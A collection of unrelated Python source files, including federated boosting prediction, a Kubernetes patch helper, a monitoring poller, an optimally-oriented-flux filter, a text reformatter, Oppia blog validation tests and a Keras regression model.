summary = {'best_iteration': self.validation_strategy.best_iteration, 'is_converged': self.is_converged}
LOGGER.debug('summary is {}'.format(summary))
return summary
@staticmethod
def traverse_a_tree(tree: HeteroDecisionTreeHost, sample, cur_node_idx):
nid, _ = tree.traverse_tree(predict_state=(cur_node_idx, -1), data_inst=sample,
decoder=tree.decode, split_maskdict=tree.split_maskdict,
missing_dir_maskdict=tree.missing_dir_maskdict, sitename=tree.sitename,
tree_=tree.tree_node, zero_as_missing=tree.zero_as_missing,
use_missing=tree.use_missing)
return nid, _
@staticmethod
def traverse_trees(leaf_pos, sample, trees: List[HeteroDecisionTreeHost]):
for t_idx, tree in enumerate(trees):
cur_node_idx = leaf_pos['node_pos'][t_idx]
# idx is set as -1 when a sample reaches leaf
if cur_node_idx == -1:
continue
nid, _ = HeteroSecureBoostingTreeHost.traverse_a_tree(tree, sample, cur_node_idx)
leaf_pos['node_pos'][t_idx] = nid
return leaf_pos
def boosting_fast_predict(self, data_inst, trees: List[HeteroDecisionTreeHost]):
comm_round = 0
traverse_func = functools.partial(self.traverse_trees, trees=trees)
while True:
LOGGER.debug('cur predict round is {}'.format(comm_round))
stop_flag = self.predict_transfer_inst.predict_stop_flag.get(idx=0, suffix=(comm_round, ))
if stop_flag:
break
guest_node_pos = self.predict_transfer_inst.guest_predict_data.get(idx=0, suffix=(comm_round, ))
host_node_pos = guest_node_pos.join(data_inst, traverse_func)
if guest_node_pos.count() != host_node_pos.count():
raise ValueError('sample count mismatch: guest table {}, host table {}'.format(guest_node_pos.count(),
host_node_pos.count()))
self.predict_transfer_inst.host_predict_data.remote(host_node_pos, idx=-1, suffix=(comm_round, ))
comm_round += 1
@assert_io_num_rows_equal
def predict(self, data_inst):
LOGGER.info('running prediction')
processed_data = self.data_and_header_alignment(data_inst)
predict_start_round = self.sync_predict_start_round()
rounds = len(self.boosting_model_list) // self.booster_dim
trees = []
for idx in range(predict_start_round, rounds):
for booster_idx in range(self.booster_dim):
tree = self.load_booster(self.booster_meta,
self.boosting_model_list[idx * self.booster_dim + booster_idx],
idx, booster_idx)
trees.append(tree)
if len(trees) == 0:
LOGGER.info('no tree for predicting, prediction done')
return
self.boosting_fast_predict(processed_data, trees=trees)
def get_model_meta(self):
model_meta = BoostingTreeModelMeta()
model_meta.tree_meta.CopyFrom(self.booster_meta)
model_meta.num_trees = self.boosting_round
model_meta.quantile_meta.CopyFrom(QuantileMeta(bin_num=self.bin_num))
meta_name = "HeteroSecureBoostingTreeHostMeta"
return meta_name, model_meta
def get_model_param(self):
model_param = BoostingTreeModelParam()
model_param.tree_num = len(self.boosting_model_list)
model_param.tree_dim = self.booster_dim
model_param.trees_.extend(self.boosting_model_list)
anonymous_name_mapping = {}
party_id = self.component_properties.local_partyid
for fid, name in self.feature_name_fid_mapping.items():
anonymous_name_mapping[generate_anonymous(fid, role=consts.HOST, party_id=party_id,)] = name
model_param.anonymous_name_mapping.update(anonymous_name_mapping)
model_param.feature_name_fid_mapping.update(self.feature_name_fid_mapping)
model_param.model_name = consts.HETERO_SBT
model_param.anonymous_name_mapping.update(anonymous_name_mapping)
model_param.feature_name_fid_mapping.update(self.feature_name_fid_mapping)
model_param.model_name = consts.HETERO_SBT
model_param.best_iteration = -1 if self.validation_strategy is None else self.validation_strategy.best_iteration
param_name = "HeteroSecureBoostingTreeHostParam"
return param_name, model_param
def set_model_meta(self, model_meta):
self.booster_meta = model_meta.tree_meta
self.boosting_round = model_meta.num_trees
self.bin_num = model_meta.quantile_meta.bin_num
def set_model_param(self, model_param):
self.boosting_model_list = list(model_param.trees_)
self.booster_dim = model_param.tree_dim
self.feature_name_fid_mapping.update(model_param.feature_name_fid_mapping)
|
the-stack_106_19104
|
from typing import Optional, cast
import aiohttp
from kopf.clients import auth
from kopf.clients import discovery
from kopf.structs import bodies
from kopf.structs import patches
from kopf.structs import resources
@auth.reauthenticated_request
async def patch_obj(
*,
resource: resources.Resource,
patch: patches.Patch,
namespace: Optional[str] = None,
name: Optional[str] = None,
body: Optional[bodies.Body] = None,
context: Optional[auth.APIContext] = None, # injected by the decorator
) -> None:
"""
Patch a resource of specific kind.
Either the namespace+name should be specified, or the body,
which is used only to get namespace+name identifiers.
Unlike the object listing, the namespaced call is always
used for the namespaced resources, even if the operator serves
the whole cluster (i.e. is not namespace-restricted).
"""
if context is None:
raise RuntimeError("API instance is not injected by the decorator.")
if body is not None and (name is not None or namespace is not None):
raise TypeError("Either body, or name+namespace can be specified. Got both.")
namespace = body.get('metadata', {}).get('namespace') if body is not None else namespace
name = body.get('metadata', {}).get('name') if body is not None else name
is_namespaced = await discovery.is_namespaced(resource=resource, context=context)
namespace = namespace if is_namespaced else None
if body is None:
body = cast(bodies.Body, {'metadata': {'name': name}})
if namespace is not None:
body['metadata']['namespace'] = namespace
as_subresource = await discovery.is_status_subresource(resource=resource, context=context)
body_patch = dict(patch) # shallow: for mutation of the top-level keys below.
status_patch = body_patch.pop('status', None) if as_subresource else None
try:
if body_patch:
await context.session.patch(
url=resource.get_url(server=context.server, namespace=namespace, name=name),
headers={'Content-Type': 'application/merge-patch+json'},
json=body_patch,
raise_for_status=True,
)
if status_patch:
await context.session.patch(
url=resource.get_url(server=context.server, namespace=namespace, name=name,
subresource='status' if as_subresource else None),
headers={'Content-Type': 'application/merge-patch+json'},
json={'status': status_patch},
raise_for_status=True,
)
except aiohttp.ClientResponseError as e:
if e.status == 404:
pass
else:
raise
|
the-stack_106_19105
|
# -*- coding: utf-8 -*-
"""Scheduled scan mysql. Send finished group information to php"""
import gevent
from config.conf import conf
from kits.iplive import iplive
from kits.utils import get_groups
from kits.ding import send_ding_msg
from kits.utils import get_sleep_time
from kits.utils import get_records
from kits.utils import get_all_nodes
from kits.data_dictionary import NOT_SYNC_TO_NODE
def vice_callback(_ts):
groups = get_groups(_ts)
ret_obj = dict()
all_node_down_ips = []
redis_key = "iplive_cache:%d" % _ts
for group in groups:
group_id = str(group['group_id'])
app_name = group['app_name']
records = get_records(group_id, app_name)
ret_obj[group_id] = {}
if group['level'] is 4:
node_ips = get_all_nodes()
else:
node_ips = group["node_ips"].split(":")
for record in records:
_ip = record['ip']
server_id = record['server_id']
values = []
for node_ip in node_ips:
name = ":".join([node_ip, str(server_id)])
value = conf['redis'].hget(redis_key, name)
if value:
values.append(value)
ip_status, res_time = iplive(values, group['level'], _ip)
if ip_status is NOT_SYNC_TO_NODE:
continue
sql = "UPDATE records SET last_status = %s, res_time = %s WHERE server_id = %s"
conf['mysql'].update(sql, [ip_status, res_time, server_id])
ret_obj[str(group_id)][_ip] = {
'status': ip_status,
'res_time': res_time
}
if ip_status is not 0:
all_node_down_ips.append(_ip)
if all_node_down_ips:
msg = "全部节点检测都宕机的 IP列表: [%s]" % ', '.join(all_node_down_ips)
send_ding_msg(msg)
print(ret_obj)
# ==================== send this message back to php ========================
def callback_poller():
# 把所有的node 存进redis 然后来一个结果拿出来比对接收到的数量是否已经达到要求
# 致命缺陷就是 万一节点端超时或者少发了一个怎么办。 除非在服务端弄个定时器
print("Starting callback poller to php .....")
while True:
sleep_time, _ts = get_sleep_time()
gevent.sleep(sleep_time + 15)
vice_callback(_ts)
|
the-stack_106_19106
|
import click
import numpy as np
from numpy.fft import fft, ifft
from scipy.special import jv as besselj
import nibabel as nib
from tqdm import tqdm
EPSILON = 1e-12
class OOF:
def __init__(self, input_path=None):
self.nifti = None
self.array = None
self.radii = None
self.spacing = 1, 1, 1
self.num_radii = 6
if input_path is not None:
self.nifti = nib.load(str(input_path))
self.array = self.nifti.get_data()
self.spacing = self.get_spacing()
self.radii = self.get_radii()
self.sigma = min(self.spacing)
self.response_type = 0
self.use_absolute = True
self.normalization_type = 1
def get_spacing(self):
return self.nifti.header.get_zooms()
def get_radii(self):
return np.arange(1, self.num_radii + 1) * min(self.spacing)
def check_normalization(self, radii):
if min(radii) < self.sigma and self.normalization_type > 0:
print('Sigma must be >= minimum range to enable the advanced'
' normalization. The current setting falls back to'
' normalization_type = 0 because of the undersize sigma.')
self.normalization_type = 0
def compute_oof(self, array, radii):
array = array.astype(np.double)
shape = array.shape
output = np.zeros(shape)
self.check_normalization(radii)
imgfft = fft(array)
x, y, z, sphere_radius = get_min_sphere_radius(shape, self.spacing)
for radius in tqdm(radii):
tqdm.write(f'Computing radius {radius:.3f}...')
circle = circle_length(radius)
nu = 1.5
z = circle * EPSILON
bessel = besselj(nu, z) / EPSILON**(3 / 2)
base = radius / np.sqrt(2 * radius * self.sigma - self.sigma**2)
exponent = self.normalization_type
volume = get_sphere_volume(radius)
normalization = volume / bessel / radius**2 * base**exponent
exponent = - self.sigma**2 * 2 * np.pi**2 * sphere_radius**2
num = normalization * np.exp(exponent)
den = sphere_radius**(3/2)
besselj_buffer = num / den
cs = circle * sphere_radius
a = np.sin(cs) / cs - np.cos(cs)
b = np.sqrt(1 / (np.pi**2 * radius * sphere_radius))
besselj_buffer = besselj_buffer * a * b * imgfft
outputfeature_11 = np.real(ifft(x * x * besselj_buffer))
outputfeature_12 = np.real(ifft(x * y * besselj_buffer))
outputfeature_13 = np.real(ifft(x * z * besselj_buffer))
outputfeature_22 = np.real(ifft(y * y * besselj_buffer))
outputfeature_23 = np.real(ifft(y * z * besselj_buffer))
outputfeature_33 = np.real(ifft(z * z * besselj_buffer))
eigenvalues = eigenvalue_field33(
outputfeature_11,
outputfeature_12,
outputfeature_13,
outputfeature_22,
outputfeature_23,
outputfeature_33
)
lambda_1, lambda_2, lambda_3 = eigenvalues
maxe = np.copy(lambda_1)
mine = np.copy(lambda_1)
mide = maxe + lambda_2 + lambda_3
if self.use_absolute:
maxe[np.abs(lambda_2) > np.abs(maxe)] = lambda_2[np.abs(lambda_2) > np.abs(maxe)]
mine[np.abs(lambda_2) < np.abs(mine)] = lambda_2[np.abs(lambda_2) < np.abs(mine)]
maxe[np.abs(lambda_3) > np.abs(maxe)] = lambda_3[np.abs(lambda_3) > np.abs(maxe)]
mine[np.abs(lambda_3) < np.abs(mine)] = lambda_3[np.abs(lambda_3) < np.abs(mine)]
else:
maxe[lambda_2 > np.abs(maxe)] = lambda_2[lambda_2 > np.abs(maxe)]
mine[lambda_2 < np.abs(mine)] = lambda_2[lambda_2 < np.abs(mine)]
maxe[lambda_3 > np.abs(maxe)] = lambda_3[lambda_3 > np.abs(maxe)]
mine[lambda_3 < np.abs(mine)] = lambda_3[lambda_3 < np.abs(mine)]
mide -= maxe + mine
if self.response_type == 0:
tmpfeature = maxe
elif self.response_type == 1:
tmpfeature = maxe + mide
elif self.response_type == 2:
tmpfeature = np.sqrt(np.maximum(0, maxe * mide))
elif self.response_type == 3:
tmpfeature = np.sqrt(
np.maximum(0, maxe * mide) * np.maximum(0, mide))
elif self.response_type == 4:
tmpfeature = np.maximum(0, maxe)
elif self.response_type == 5:
tmpfeature = np.maximum(0, maxe + mide)
stronger_response = np.abs(tmpfeature) > np.abs(output)
output[stronger_response] = tmpfeature[stronger_response]
return output
def run(self, output_path):
oof = self.compute_oof(self.array, self.radii)
output_nii = nib.Nifti1Image(oof, self.nifti.affine)
output_nii.header['sform_code'] = 0
output_nii.header['qform_code'] = 1
output_nii.to_filename(str(output_path))
def get_min_sphere_radius(shape, spacing):
x, y, z = ifft_shifted_coordinates_matrix(shape)
si, sj, sk = shape
pi, pj, pk = spacing
x /= si * pi
y /= sj * pj
z /= sk * pk
sphere_radius = np.sqrt(x**2 + y**2 + z**2) + EPSILON
return x, y, z, sphere_radius
def get_sphere_volume(radius):
return 4 / 3 * np.pi * radius**3
def circle_length(radius):
return 2 * np.pi * radius
def ifft_shifted_coordinates_matrix(shape):
shape = np.array(shape)
dimensions = len(shape)
p = shape // 2
result = []
for i in range(dimensions):
x = np.arange(p[i], shape[i])
y = np.arange(p[i])
a = np.concatenate((x, y)) - p[i]
reshapepara = np.ones(dimensions, np.uint16)
reshapepara[i] = shape[i]
A = np.reshape(a, reshapepara)
repmatpara = np.copy(shape)
repmatpara[i] = 1
coords = np.tile(A, repmatpara).astype(float)
result.append(coords)
return result
def freq_op(freq, marginwidth):
result = freq[marginwidth[0]:-1 - marginwidth[0],
marginwidth[1]:-1 - marginwidth[1],
marginwidth[2]:-1 - marginwidth[2]]
return result
def eigenvalue_field33(a11, a12, a13, a22, a23, a33, epsilon=1e-50):
"""
Calculate the eigenvalues of massive 3x3 real symmetric matrices.
Computation is based on matrix operation and GPU computation is
supported.
Syntax:
λ1, λ2, λ3 = eigenvaluefield33(a11, a12, a13, a22, a23, a33)
a11, a12, a13, a22, a23 and a33 specify the symmetric 3x3 real symmetric
matrices as:
[[a11, a12, a13],
[a12, a22, a13],
[a13, a23, a33]]
These six inputs must have the same size. They can be 2D, 3D or any
dimension. The outputs eigenvalue1, eigenvalue2 and eigenvalue3 will
follow the size and dimension of these inputs. Owing to the use of
trigonometric functions, the inputs must be double to maintain the
accuracy.
eigenvalue1, eigenvalue2 and eigenvalue3 are the unordered resultant
eigenvalues. They are solved using the cubic equation solver, see
http://en.wikipedia.org/wiki/Eigenvalue_algorithm
The peak memory consumption of the method is about 1.5 times of the total
of all inputs, in addition to the original inputs.
Author: Max W.K. Law
Email: [email protected]
Page: http://www.cse.ust.hk/~maxlawwk/
Python implementation by:
Fernando Perez-Garcia
[email protected]
"""
a11 = a11.astype(np.double)
a12 = a12.astype(np.double)
a13 = a13.astype(np.double)
a22 = a22.astype(np.double)
a23 = a23.astype(np.double)
a33 = a33.astype(np.double)
b = a11 + epsilon
d = a22 + epsilon
j = a33 + epsilon
c = - (a12**2 + a13**2 + a23**2 - b * d - d * j - j * b)
mul1 = a23**2 * b + a12**2 * j + a13**2 * d
mul2 = a13 * a12 * a23
d = - (b * d * j - mul1 + 2 * mul2)
b = - a11 - a22 - a33 - epsilon - epsilon - epsilon
d += (2 * b**3 - 9 * b * c) / 27
c *= -1
c += b**2 / 3
c **= 3
c /= 27
np.maximum(0, c, out=c)
np.sqrt(c, out=c)
j = c**(1 / 3)
c += c == 0
d *= - 1 / 2 / c
np.clip(d, -1, 1, out=d)
d = np.real(np.arccos(d) / 3)
c = j * np.cos(d)
d = j * np.sqrt(3) * np.sin(d)
b *= - 1 / 3
j = - c - d + b
d += b - c
b += 2 * c
lambda_1 = b.astype(np.single)
lambda_2 = j.astype(np.single)
lambda_3 = d.astype(np.single)
return lambda_1, lambda_2, lambda_3
@click.command()
@click.argument('input-path', type=click.Path(exists=True))
@click.argument('output-path', type=click.Path())
def main(input_path, output_path):
OOF(input_path).run(output_path)
|
the-stack_106_19108
|
import time
from _common import *
from boardgamegeek import BGGValueError, BGGRestrictSearchResultsTo
def test_search(bgg, mocker):
mock_get = mocker.patch("requests.sessions.Session.get")
mock_get.side_effect = simulate_bgg
res = bgg.search("some invalid game name", exact=True)
assert not len(res)
res = bgg.search("Twilight Struggle", exact=True)
assert len(res)
# test that the new type of search works
res = bgg.search("Agricola", search_type=[BGGRestrictSearchResultsTo.BOARD_GAME])
assert type(res[0].id) == int
with pytest.raises(BGGValueError):
bgg.search("Agricola", search_type=["invalid-search-type"])
|
the-stack_106_19109
|
#Geradores e sua importância:
#código travador, nao executar fora de ambiente de controle
#ESSE CODIGO ENCHERÁ A MEMÓRIA AOS POUCOS COM UMA LISTA DE NÚMEROS ABSURDA, ATÉ QUE O PC TRAVE.
"""def travador(max_number):
r = []
for c in range(max_number + 1):
r.append(c)
g = travador(623*10**21)
for v in g:
print(v)"""
#ABAIXO VOCÊ VERÁ UMA FORMA DE REPRESENTAR O MESMO NUMERO GIGANTE AOS POUCOS, SEM QUE O COMPUTADOR TRAVE NECESSARIAMENTE.
"""def gerador(max_number):
for c in range(max_number + 1):
yield c
g = gerador(623*10**21)
for v in g:
print(v)"""
lista1 = [1,2,3,4,5,6]
lista2 = [6,7,8,9,10]
def soma(*args):
lista_soma = [x + y for x,y in zip(args)]
print(soma(lista1,lista2))
|
the-stack_106_19113
|
#!/usr/bin/env python3
r"""
usage: fmt.py [-h] [-w WIDTH] [--ruler]
join lines of the same indentation, and split at width or before it
options:
-h, --help show this help message and exit
-w WIDTH width to split at or before (default: don't print into last column of terminal)
--ruler show a ruler to count off the columns
quirks:
buffers whole paragraphs, not just lines, but takes each blank line as its own paragraph
joins and splits all lines, not just lines that don't begin with an nroff "." dot
defaults to fit inside terminal width, not to the prefer 65 within max 75 of bash "fmt"
guesses -w terminal width from "COLUMNS", else sys.stdout, else "/dev/tty", else guesses 80
prints '_' skids onto the ruler to mark the tabsize=8 tab stops: 1, 9, 17, ...
unsurprising quirks:
prompts for stdin, like mac bash "grep -R .", unlike bash "fmt"
accepts the "stty -a" line-editing c0-control's, not also the "bind -p" c0-control's
takes file "-" as meaning "/dev/stdin", like linux "fmt -", unlike mac "fmt -"
examples:
echo 'a b c d e f g h i j k l m' |fmt.py -9 # keep blanks except at joins and splits
echo ' a b c$ d e f$ g$$h' |tr '$' '\n' |fmt.py -9 # group by common indents
echo ' a b c' |fmt.py -1 # forward indentation wider than wanted, if present
:
echo $(seq 0 99) |fmt.py # split to fit inside Terminal
echo $(seq 0 39) |fmt.py -42 # split to fit inside width
echo $(seq 0 39) |tr -d ' ' |fmt.py -42 # no split at width
echo su-per-ca-li-fra-gil-is-tic-ex-pi-a-li-doc-ious |fmt.py -42 # no split at "-" dashes
:
fmt.py --ruler -w72 # ends in column 72
: # 5678_0123456_8901234_6789012_4567890 2345678_0123456_8901234_6789012 # the 72-column ruler
"""
# FIXME: -h25 -w79 to help shrink a G Cloud Shell that far
import os
import re
import sys
import textwrap
import argdoc
def main(argv):
"""Run from the command line"""
stdout_columns = sys_stdout_guess_tty_columns()
# Parse the command line
fmt_argv_tail = list(argv[1:])
for (index, arg) in enumerate(argv[1:]):
if re.match(r"^[-][0-9]+$", string=arg):
fmt_argv_tail[index] = "-w{}".format(-int(arg))
args = argdoc.parse_args(fmt_argv_tail)
width = (stdout_columns - 1) if (args.w is None) else int(args.w)
# Option to print the ruler and discard Stdin
if args.ruler:
print_ruler(width)
return
# Else join and split Stdin
fmt_paragraphs_of_stdin(width)
def print_ruler(width):
"""Print one monospaced char per column to help number the columns accurately"""
dupes = (width + 10 - 1) // 10
chars = dupes * "1234567890" # one-based, not zero-based
assert len(chars) >= width
ruler = chars[:width]
for tabstop in range(0, width, 8):
ruler = ruler[:tabstop] + "_" + ruler[(tabstop + 1) :]
for halfscreen in range(40, width, 40):
ruler = ruler[:halfscreen] + " " + ruler[(halfscreen + 1) :]
assert len(ruler) == width
print(ruler.rstrip())
def fmt_paragraphs_of_stdin(width):
"""Join lines of the same indentation, and split at width or before it"""
column = width + 1
prompt_tty_stdin("Joining words, resplitting before column {}".format(column))
para = list()
para_dent = None
while True:
line = sys.stdin.readline()
if not line:
if para:
fmt_one_paragraph(para_dent, para=para, width=width)
break
(str_dent, text) = str_splitdent(line)
rstripped = text.rstrip()
dent = str_dent if rstripped else None
if (dent != para_dent) or (not rstripped):
if para:
fmt_one_paragraph(para_dent, para=para, width=width)
para = list()
para_dent = dent
if rstripped:
para.append(rstripped)
else:
print()
def fmt_one_paragraph(dent, para, width):
"""Join words of one paragraph, resplit them into fewest wide lines, and print the lines"""
assert dent is not None
assert all(_ for _ in para)
text = "\n".join(para)
fill_width = (width - len(dent)) if (len(dent) < width) else 1
fill_chars = textwrap.fill(
text, width=fill_width, break_on_hyphens=False, break_long_words=False
)
fill_lines = fill_chars.splitlines()
assert fill_lines # TODO: think some more here
for fill_line in fill_chars.splitlines():
print((dent + fill_line).rstrip())
#
# Define some Python idioms
#
# deffed in many files # missing from docs.python.org
def sys_stdout_guess_tty_columns(*hints):
"""
Run all the searches offered, accept the first result found if any, else return None
Default to search: "COLUMNS", sys.stdout, "/dev/tty", 80
To fail fast, call for all the guesses always, while still returning only the first that works
"""
chosen_hints = hints if hints else ("COLUMNS", sys.stdout, "/dev/tty", 80)
terminal_widths = list()
for hint in chosen_hints:
terminal_width = sys_stdout_guess_tty_columns_os(hint)
if terminal_width is None:
terminal_width = sys_stdout_guess_tty_columns_os_environ_int(hint)
else:
_ = sys_stdout_guess_tty_columns_os_environ_int(hint)
if terminal_width is not None:
terminal_widths.append(terminal_width)
if terminal_widths:
terminal_width = terminal_widths[0]
return terminal_width
return None
# deffed in many files # missing from docs.python.org
def sys_stdout_guess_tty_columns_os(hint):
"""Try "os.get_terminal_size", and slap back "shutil.get_terminal_size" pushing (80, 24)"""
showing = None
fd = None
if hasattr(hint, "fileno"):
streaming = hint
fd = streaming.fileno()
elif hasattr(hint, "startswith"):
if hint.startswith(os.sep):
devname = hint
showing = open(devname) # pylint: disable=consider-using-with
fd = showing.fileno()
terminal_width = None
if fd is not None:
try:
terminal_size = os.get_terminal_size(fd)
terminal_width = terminal_size.columns
except OSError: # such as OSError: [Errno 25] Inappropriate ioctl for device
pass
if showing:
showing.close()
return terminal_width
# deffed in many files # missing from docs.python.org
def sys_stdout_guess_tty_columns_os_environ_int(hint):
"""Pull digits from "os.environ" via the hint as key, else from the hint itself"""
digits = hint
if hasattr(hint, "startswith"):
envname = hint
try:
digits = os.environ[envname]
except KeyError: # such as KeyError: 'COLUMN'
pass
try:
terminal_width = int(digits)
except TypeError: # such as TypeError: must be ... not 'list'
terminal_width = None
except ValueError: # such as ValueError: invalid literal ... with base 10
terminal_width = None
return terminal_width
# deffed in many files # missing from docs.python.org
def prompt_tty_stdin(message=None):
if sys.stdin.isatty():
if message is not None:
stderr_print(message)
stderr_print("Press ⌃D EOF to quit")
# deffed in many files # missing from docs.python.org
def str_splitdent(line):
"""Split apart the indentation of a line, from the remainder of the line"""
lstripped = line.lstrip()
len_dent = len(line) - len(lstripped)
tail = lstripped
if not lstripped: # see no chars, not all chars, as the indentation of a blank line
tail = line
len_dent = 0
dent = len_dent * " "
return (dent, tail)
# deffed in many files # missing from docs.python.org
def stderr_print(*args):
"""Print the Args, but to Stderr, not to Stdout"""
sys.stdout.flush()
print(*args, file=sys.stderr)
sys.stderr.flush() # like for kwargs["end"] != "\n"
if __name__ == "__main__":
main(sys.argv)
# copied from: git clone https://github.com/pelavarre/pybashish.git
|
the-stack_106_19114
|
from __future__ import print_function, absolute_import, division, unicode_literals
# This file is part of the ISIS IBEX application.
# Copyright (C) 2012-2016 Science & Technology Facilities Council.
# All rights reserved.
#
# This program is distributed in the hope that it will be useful.
# This program and the accompanying materials are made available under the
# terms of the Eclipse Public License v1.0 which accompanies this distribution.
# EXCEPT AS EXPRESSLY SET FORTH IN THE ECLIPSE PUBLIC LICENSE V1.0, THE PROGRAM
# AND ACCOMPANYING MATERIALS ARE PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND. See the Eclipse Public License v1.0 for more details.
#
# You should have received a copy of the Eclipse Public License v1.0
# along with this program; if not, you can obtain a copy from
# https://www.eclipse.org/org/documents/epl-v10.php or
# http://opensource.org/licenses/eclipse-1.0.php
# Add root path for access to server_commons
import os
import sys
os.environ["MYDIRBLOCK"] = os.path.abspath('..')
sys.path.insert(0, os.path.abspath(os.environ["MYDIRBLOCK"]))
# Standard imports
import unittest
import xmlrunner
import argparse
DEFAULT_DIRECTORY = os.path.join('..', '..', '..', '..', 'test-reports')
if __name__ == '__main__':
# get output directory from command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('-o', '--output_dir', nargs=1, type=str, default=[DEFAULT_DIRECTORY],
help='The directory to save the test reports')
args = parser.parse_args()
xml_dir = args.output_dir[0]
# Load tests from test suites
test_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "test_modules"))
test_suite = unittest.TestLoader().discover(test_dir, pattern="test_*.py")
print("\n\n------ BEGINNING DATABASE SERVER UNIT TESTS ------")
ret_vals = xmlrunner.XMLTestRunner(output=xml_dir).run(test_suite)
print("------ DATABASE SERVER UNIT TESTS COMPLETE ------\n\n")
# Return failure exit code if a test failed
sys.exit(bool(ret_vals.errors or ret_vals.failures))
|
the-stack_106_19116
|
# coding: utf-8
#
# Copyright 2021 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for blog model job errors."""
from __future__ import annotations
from core import utils
from core.jobs.types import base_validation_errors_test
from core.jobs.types import blog_validation_errors
from core.platform import models
MYPY = False
if MYPY: # pragma: no cover
from mypy_imports import blog_models
(blog_models,) = models.Registry.import_models([models.NAMES.blog])
class DuplicateBlogTitleErrorTests(
base_validation_errors_test.AuditErrorsTestBase):
def test_message(self) -> None:
blog_post_model = blog_models.BlogPostModel(
id='validblogid1',
title='Sample Title',
content='<p>hello</p>,',
author_id='user',
url_fragment='url_fragment_1')
error = blog_validation_errors.DuplicateBlogTitleError(blog_post_model)
self.assertEqual(
error.stderr,
'DuplicateBlogTitleError in BlogPostModel(id="validblogid1"):'
' title=%s is not unique' % utils.quoted(blog_post_model.title))
class DuplicateBlogUrlErrorTests(
base_validation_errors_test.AuditErrorsTestBase):
def test_message(self) -> None:
blog_post_model = blog_models.BlogPostModel(
id='validblogid1',
title='Sample Title',
content='<p>hello</p>,',
author_id='user',
url_fragment='url_fragment_1')
error = blog_validation_errors.DuplicateBlogUrlError(blog_post_model)
self.assertEqual(
error.stderr,
'DuplicateBlogUrlError in BlogPostModel(id="validblogid1"): url=%s'
' is not unique' % utils.quoted(blog_post_model.url_fragment))
class InconsistentPublishTimestampsErrorTests(
base_validation_errors_test.AuditErrorsTestBase):
def test_message(self) -> None:
model = blog_models.BlogPostModel(
id='validblogid1',
title='Sample Title',
content='<p>hello</p>,',
author_id='user',
url_fragment='url_fragment_1',
created_on=self.NOW,
last_updated=self.YEAR_AGO,
published_on=self.YEAR_AGO)
error = blog_validation_errors.InconsistentPublishTimestampsError(model)
self.assertEqual(
error.stderr,
'InconsistentPublishTimestampsError in BlogPostModel'
'(id="validblogid1"): created_on=%r is later than published_on=%r' %
(self.NOW, self.YEAR_AGO))
class InconsistentPublishLastUpdatedTimestampsErrorTests(
base_validation_errors_test.AuditErrorsTestBase):
def test_message(self) -> None:
model = blog_models.BlogPostModel(
id='validblogid1',
title='Sample Title',
content='<p>hello</p>,',
author_id='user',
url_fragment='url_fragment_1',
created_on=self.YEAR_AGO,
last_updated=self.YEAR_AGO,
published_on=self.NOW)
error = (
blog_validation_errors
.InconsistentPublishLastUpdatedTimestampsError(model))
self.assertEqual(
error.stderr,
'InconsistentPublishLastUpdatedTimestampsError in BlogPostModel'
'(id="validblogid1"): published_on=%r is later than last_updated=%r'
% (self.NOW, self.YEAR_AGO))
class ModelMutatedDuringJobErrorTests(
base_validation_errors_test.AuditErrorsTestBase):
def test_message(self) -> None:
model = blog_models.BlogPostModel(
id='validblogid1',
title='Sample Title',
content='<p>hello</p>,',
author_id='user',
url_fragment='url_fragment_1',
created_on=self.YEAR_AGO,
last_updated=self.NOW,
published_on=self.YEAR_AGO)
error = blog_validation_errors.ModelMutatedDuringJobError(model)
self.assertEqual(
error.stderr,
'ModelMutatedDuringJobError in BlogPostModel(id="validblogid1"): '
'published_on=%r is later than the audit job\'s start time' % (
model.published_on))
|
the-stack_106_19117
|
import tensorflow as tf
from tensorflow import keras
import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import mean_absolute_error, mean_squared_error
class MLPModel():
def __init__(self, args):
self.args = args
self.feat_dim = args['feat_dim']
self.batch_size = args['batch_size']
self.epochs = args['epochs']
self.lr = args['lr']
self.build_model()
def build_model(self):
inputs = keras.Input(shape=(self.feat_dim,))
x = keras.layers.Dense(20, activation='relu')(inputs)
x = keras.layers.Dropout(0.5)(x)
x = keras.layers.Dense(50, activation='relu')(x)
x = keras.layers.Dropout(0.5)(x)
x = keras.layers.Dense(50, activation='relu')(x)
x = keras.layers.Dropout(0.5)(x)
x = keras.layers.Dense(20, activation='relu')(x)
x = keras.layers.Dropout(0.5)(x)
outputs = keras.layers.Dense(1)(x)
self.model = keras.Model(inputs=inputs, outputs=outputs)
self.model.compile(optimizer=tf.train.AdamOptimizer(self.lr),
loss='mse',
metrics=['mse'])
def train(self, data, label, val_data, val_label):
data ,label = self.data_scaler(data, label)
val_data = self.x_scaler.transform(val_data)
val_label = self.y_scaler.transform(val_label.reshape(-1, 1)).reshape(-1)
callback = keras.callbacks.EarlyStopping(monitor='val_mse', patience=10, restore_best_weights=True)
self.model.fit(data, label, batch_size=self.batch_size, epochs=self.epochs, callbacks=[callback], validation_data=(val_data, val_label))
def data_scaler(self, data, label):
self.x_scaler = StandardScaler().fit(data)
scaled_data = self.x_scaler.transform(data)
self.y_scaler = StandardScaler().fit(label.reshape(-1, 1))
scaled_label = self.y_scaler.transform(label.reshape(-1, 1)).reshape(-1)
return scaled_data, scaled_label
def evaluate(self, test_data, test_label):
scaled_test_data = self.x_scaler.transform(test_data)
pred = self.model.predict(scaled_test_data)
pred_label = pred * self.y_scaler.scale_[0] + self.y_scaler.mean_[0]
pred_label = pred_label.reshape(-1)
mae = mean_absolute_error(test_label, pred_label)
mse = mean_squared_error(test_label, pred_label)
print('test mae: {}'.format(mae))
print('test mse: {}'.format(mse))
return pred_label
# data = np.random.random((100, 1))
# label = data
# val_data = np.random.random((10, 1))
# val_label = val_data
# # x = tf.placeholder(tf.float32, shape=[None, 1], )
# inputs = keras.Input(shape=(1,))
# outputs = keras.layers.Dense(1,
# kernel_initializer=keras.initializers.Constant(1.0),
# bias_initializer=keras.initializers.Constant(0.0))(inputs)
